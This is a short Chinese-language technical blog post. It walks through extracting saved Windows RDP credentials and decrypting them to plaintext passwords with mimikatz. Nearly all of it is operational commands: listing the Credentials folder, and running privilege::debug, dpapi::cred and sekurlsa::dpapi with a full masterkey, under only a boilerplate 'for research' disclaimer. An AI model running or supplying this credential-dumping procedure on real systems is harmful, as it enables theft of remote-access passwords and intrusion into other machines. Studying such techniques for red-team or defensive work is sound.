通过mimikatz获取RDPwindows远程桌面密码凭证获取
分类:技术文章
时间:2024-03-13 17:06
浏览:0
评论:0
此方法需要灵活贯通,操作稍微比较复杂
1、底部下载软件 mimikatz
2、查询是否有RDP密码文件(CMD运行)
dir /a %userprofile%\AppData\Local\Microsoft\Credentials\*
分不清哪个是哪个怎么办,打开 “控制面板\用户帐户\凭据管理器”对照修改时间,复制右边文字
3、右键管理员身份运行 mimikatz.exe 对密码文件进行解密
privilege::debug dpapi::cred /in:C:\Users\administrator.LUCKYSEC\AppData\Local\Microsoft\Credentials\5490905D7B7F0E87893DE8FCE6CC1710
复制 guidMasterKey 右侧文本
sekurlsa::dpapi
根据guidMasterKey,使用mimikatz找到对应的Masterkey
通过Masterkey,使用mimikatz解密pbData数据,获取RDP连接明文密码
dpapi::cred /in:C:\Users\administrator.LUCKYSEC\AppData\Local\Microsoft\Credentials\5490905D7B7F0E87893DE8FCE6CC1710 /masterkey:c7c73d9e7a83ed8991e7a0de7942a5ab6c8924ff71c33ef8370a5294f677042787f311c534977476cbe6514ae2ba77d11172fbd5b6a51ff188f87d720b44fee1
1. 本站所有资源来源于用户上传或网络,仅作为参考研究使用,如有侵权请邮件联系站长!
2. 本站积分货币获取途径以及用途的解读,想在本站混的好,请务必认真阅读!
3. 本站强烈打击盗版/破解等有损他人权益和违法作为,请各位会员支持正版!
4. 技术文章 > 通过mimikatz获取RDPwindows远程桌面密码凭证获取
2. 本站积分货币获取途径以及用途的解读,想在本站混的好,请务必认真阅读!
3. 本站强烈打击盗版/破解等有损他人权益和违法作为,请各位会员支持正版!
4. 技术文章 > 通过mimikatz获取RDPwindows远程桌面密码凭证获取
